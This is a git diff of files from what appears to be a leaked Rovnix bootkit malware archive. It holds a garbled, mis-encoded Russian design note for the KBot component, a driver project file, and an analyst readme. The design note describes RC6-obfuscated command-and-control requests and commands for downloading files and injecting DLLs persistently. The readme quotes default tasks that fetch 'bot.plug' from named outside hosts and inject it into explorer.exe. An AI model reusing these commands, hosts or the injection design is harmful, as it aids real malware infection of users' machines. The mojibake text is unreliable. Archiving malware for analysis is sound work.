+Ïðîåêò cîáèðàåòñÿ â ñòàòè÷åñêè ïîäêëþ÷àåìóþ áèáëèîòåêó(LIB), êîòîðàÿ ëèíêóåòñÿ ê äðàéâåðó.
+
+Ïðè ïåðâîì çàïóñêå ïðîãðàììà ãåíåðèðóåò 16-áèòíûé ID ïîëüçîâàòåëÿ è ñîõðàíÿåò åãî íà VFS â ôàéë \USER.ID
+Â äàëüíåéøåì ID ïîëüçîâàòåëÿ íå èçìåíÿåòñÿ è ïåðåäàåòñÿ êàæäûé ðàç ïðè çàïðîñå ê ñåðâåðó óïðàâëåíèÿ.
+
+Ïðîãðàììà îñóùåñòâëÿåò äâà òèïà HTTP çàïðîñîâ ê ñåðâåðó óïðàâëåíèÿ:
+- çàïðîñ êîôèã-ôàéëà;
+- çàïðîñ ôàéëà êîìàíä;
+
+Ïðîãðàììà ïîääåðæèâàåò îáôóñêàöèþ HTTP çàïðîñîâ.
+Äëÿ ýòîãî ñòðîêà êàæäîãî çàïðîñà øèôðóåòñÿ ñ ïîìîùüþ àëãîðèòìà RC6 è ïåðåâîäèòñÿ â ôîðìàò BASE64.
+
+Ïðîãðàììà ïîääåðæèâàåò ïðîâåðêó öèôðîâîé ïîäïèñè è øèôðîâàíèå êîíôèã-ôàéëîâ è ôàéëîâ êîìàíä.
+Äëÿ ýòîãî ê äðàéâåðó ïðèêðåïëÿåòñÿ ôàéë public.key, ñîäåðæàùèé îòêðûòûé RSA-êëþ÷.
+Ñ ïîìîùüþ ýòîãî êëþ÷à îñóùåñòâëÿåòñÿ ðàñøèôðîâêà è ïðîâåðêà ïîäïèñè ïîëó÷åííîãî ôàéëà.
+Åñëè ôàéë íå ïðîõîäèò ïðîâåðêó, òî îí èãíîðèðóåòñÿ.
+
+
+Ôàéë êîíôèãóðàöèè
+
+Ïðîãðàììà ðàáîòàåò íà îñíîâå íàñòðîåê ïðîïèñàííûõ â ôàéëå êîíôèãóðàöèè (êîíôèã-ôàéë).
+Êîíôèã-ôàéë ìîæåò õðàíèòüñÿ íà VFS, ëèáî ìîæåò áûòü ïðèêðåïëåí íåïîñðåäñòâåííî ê äðàéâåðó.
+Ïðè çàïóñêå ïðîãðàììû ñíà÷àëà èùåòñÿ ôàéë íà VFS, è åñëè åãî íåò - èñïîëüçóåòñÿ ïðèêðåïëåííûé êîíôèã-ôàéë.
+Ïðèìåð êîíôèã-ôàéëà ñ îïèñàíèåì: \BkBuild\kbot.ini
+Ïðè ïîëó÷åíèå íîâîãî êîíôèã-ôàéëà îí ñîõðàíÿåòñÿ íà VFS â ôàéë \KBOT.INI Ñóùåñòâóþùèé KBOT.INI çàìåíÿåòñÿ.
+
+
+Ôàéë êîìàíä
+
+Òåêñòîâûé ôàéë ñîäåðæàùèé îäíó èëè íåñêîëüêî èç ñëåäóþùèõ êîìàíä:
+
+	LOAD_FILE <HTTP ññûëêà> [èìÿ ôàéëà íà VFS]	- ñêà÷èâàåò ôàéë ïî çàäàííîé ññûëêå è ñîõðàíÿåò íà VFS ñ çàäàííûì èìåíåì 
+	
+	DELETE_FILE	<èìÿ ôàéëà íà VFS>				- óäàëÿåò óêàçàííûé ôàéë ñ VFS
+	
+	SET_INJECT <èìÿ ôàéëà íà VFS> <ñïèñîê ïðîöåññîâ> - çàäàåò èíæåêò óêàçàííîãî ôàéëà (êàê ïðàâèëî DLL) â
+		óêàçàííûå â ñïèñêå ïðîöåññû. Âñå çàäàííûå èíæåêòû ïðèìåíÿþòñÿ íåìåäëåííî è ñîõðàíÿþòñÿ 
+		â ôàéëå \INJECTS.SYS íà VFS, òàê, ÷òîáû áûòü àêòèâíûìè ïîñëå ïåðåçàãðóçêè ÎÑ.
+		×òîáû óäàëèòü èíæåêò èñïîëüçóåòñÿ êîìàíäà "SET_INJECT <èìÿ ôàéëà íà VFS>" áåç ñïèñêà ïðîöåññîâ.
+		
+ Èìåíà êîìàíä ÷óâñòâèòåëüíû ê ðåãèñòðó, ïàðàìåòðû - íåò.
diff --git a/Rovnix/_DUMP/ed66ad26d6c472a1b42290deb2f169a2b3dfc424.svn-base b/Rovnix/_DUMP/ed66ad26d6c472a1b42290deb2f169a2b3dfc424.svn-base
new file mode 100644
index 000000000..8bdea1019
--- /dev/null
+++ b/Rovnix/_DUMP/ed66ad26d6c472a1b42290deb2f169a2b3dfc424.svn-base
@@ -0,0 +1,159 @@
+<?xml version="1.0" encoding="windows-1251"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="8,00"
+	Name="KBot"
+	ProjectGUID="{ECAC96DA-92E0-4D23-AFF4-87A4ECB18FDA}"
+	Keyword="MakeFileProj"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+		<Platform
+			Name="x64"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="0"
+			>
+			<Tool
+				Name="VCNMakeTool"
+				BuildCommandLine="ddkbuild -WIN7 checked ."
+				ReBuildCommandLine="ddkbuild -WIN7 checked . -cZ"
+				CleanCommandLine=""
+				Output="fslib.lib"
+				PreprocessorDefinitions="WIN32;_DEBUG"
+				IncludeSearchPath="$(WNETBASE)\inc\ddk\wxp&quot;;&quot;$(WLHBASE)\inc\ddk&quot;"
+				ForcedIncludes="..\version.h"
+				AssemblySearchPath=""
+				ForcedUsingAssemblies=""
+				CompileAsManaged=""
+			/>
+		</Configuration>
+		<Configuration
+			Name="Debug|x64"
+			OutputDirectory="$(PlatformName)\$(ConfigurationName)"
+			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
+			ConfigurationType="0"
+			>
+			<Tool
+				Name="VCNMakeTool"
+				BuildCommandLine="ddkbuild -WIN7A64 checked ."
+				ReBuildCommandLine="ddkbuild -WIN7A64 checked . -cZ"
+				CleanCommandLine=""
+				Output="dtester.sys"
+				PreprocessorDefinitions="WIN64;_DEBUG"
+				IncludeSearchPath="$(WNETBASE)\inc\ddk\wxp&quot;;&quot;$(WLHBASE)\inc\ddk&quot;"
+				ForcedIncludes="..\version.h"
+				AssemblySearchPath=""
+				ForcedUsingAssemblies=""
+				CompileAsManaged=""
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="0"
+			>
+			<Tool
+				Name="VCNMakeTool"
+				BuildCommandLine="ddkbuild -WIN7 free ."
+				ReBuildCommandLine="ddkbuild -WIN7 free . -cZ"
+				CleanCommandLine=""
+				Output="dtester.sys"
+				PreprocessorDefinitions="WIN32;NDEBUG"
+				IncludeSearchPath="$(WNETBASE)\inc\ddk\wxp&quot;;&quot;$(WLHBASE)\inc\ddk&quot;"
+				ForcedIncludes="..\version.h"
+				AssemblySearchPath=""
+				ForcedUsingAssemblies=""
+				CompileAsManaged=""
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|x64"
+			OutputDirectory="$(PlatformName)\$(ConfigurationName)"
+			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
+			ConfigurationType="0"
+			>
+			<Tool
+				Name="VCNMakeTool"
+				BuildCommandLine="ddkbuild -WIN7A64 free ."
+				ReBuildCommandLine="ddkbuild -WIN7A64 free . -cZ"
+				CleanCommandLine=""
+				Output="dtester.sys"
+				PreprocessorDefinitions="AMD64;NDEBUG"
+				IncludeSearchPath="$(WNETBASE)\inc\ddk\wxp&quot;;&quot;$(WLHBASE)\inc\ddk&quot;"
+				ForcedIncludes="..\version.h"
+				AssemblySearchPath=""
+				ForcedUsingAssemblies=""
+				CompileAsManaged=""
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\config.c"
+				>
+			</File>
+			<File
+				RelativePath=".\kbot.c"
+				>
+			</File>
+			<File
+				RelativePath=".\sendrecv.c"
+				>
+			</File>
+			<File
+				RelativePath=".\tasks.c"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+			<File
+				RelativePath=".\kbot.h"
+				>
+			</File>
+			<File
+				RelativePath=".\kbotinc.h"
+				>
+			</File>
+			<File
+				RelativePath=".\tasks.h"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Build Files"
+			>
+			<File
+				RelativePath=".\sources"
+				>
+			</File>
+		</Filter>
+		<File
+			RelativePath=".\ReadMe.txt"
+			>
+		</File>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>
diff --git a/Rovnix/_DUMP/f0923275b362e3a05ac77fcb6d3a12e18cdcfad9.svn-base b/Rovnix/_DUMP/f0923275b362e3a05ac77fcb6d3a12e18cdcfad9.svn-base
new file mode 100644
index 000000000..58189757d
--- /dev/null
+++ b/Rovnix/_DUMP/f0923275b362e3a05ac77fcb6d3a12e18cdcfad9.svn-base
@@ -0,0 +1,7 @@
+#
+# DO NOT EDIT THIS FILE!!!  Edit .\sources. if you want to add a new source
+# file to this component.  This file merely indirects to the real make file
+# that is shared by all the driver components of the Windows NT DDK
+#
+
+!INCLUDE $(NTMAKEENV)\makefile.def
diff --git a/Rovnix/_DUMP/readme.txt b/Rovnix/_DUMP/readme.txt
new file mode 100644
index 000000000..e79c6d754
--- /dev/null
+++ b/Rovnix/_DUMP/readme.txt
@@ -0,0 +1,29 @@
+#Dump
+
+Contains some .svn files which may contain more clues to the creators etc.
+
+Example of found so far:
+
+MAKEDIR_LOWERCASE=e:\projects\progs\petrosjan\bootkit\kbot
+OBJ_PATH=e:\projects\progs\petrosjan\bootkit\kbot
+
+//#define	szDefaultTask	"LOAD_FILE http://shaparack.com/img/admin/bot.plug BT.DLL\r\nSET_INJECT BT.DLL explorer.exe\r\n"
+//#define	szDefaultTask	"LOAD_FILE http://56tgvr.info/geter/getFile.php BT1.DLL\r\nLOAD_FILE http://56tgvr.info/geter/bot.plug BT.DLL\r\nSET_INJECT BT.DLL explorer.exe\r\n"
+#define	szDefaultTask	"LOAD_FILE http://56tgvr.info/geter/getFile.php BT.DLL\r\nSET_INJECT BT.DLL explorer.exe\r\n"
+//#define	szDefaultTask	"LOAD_FILE http://az2.zika.in/rt_jar/bot.plug BT.DLL\r\nSET_INJECT BT.DLL explorer.exe\r\n"
+//#define	szDefaultTask	"LOAD_FILE http://security-checking.org/rt_jar/bot.plug BT.DLL\r\nSET_INJECT BT.DLL explorer.exe\r\n"
+
+#define		KBOT_DEFAULT_HOST_LIST	" 10.30.29.241 "
+
+
+
+// Supported commands
+// Note that command names are case-sensitive, but command parameters are not.
+
+// LOAD_FILE http://myhost.com/myfile.dll myfile32.dll	- downloads file http://myhost.com/myfile.dll and saves it to the VFS 
+//	as \MYFILE32.DLL
+// DELETE_FILE	myfile32.dll							- deletes file \MYFILE32.DLL from the VFS
+// SET_INJECT	myfile32.dll explorer.exe iexplore.exe	- requests the KLOADER to inject \MYFILE32.DLL into the specified processes
+// READ_FILE \??\C:\myfile.dll myfile.dll				- ?????? ????? ? ?????
+
+// $Date: 2012-02-20 18:55:12 +0400 (??, 20 ??? 2012) $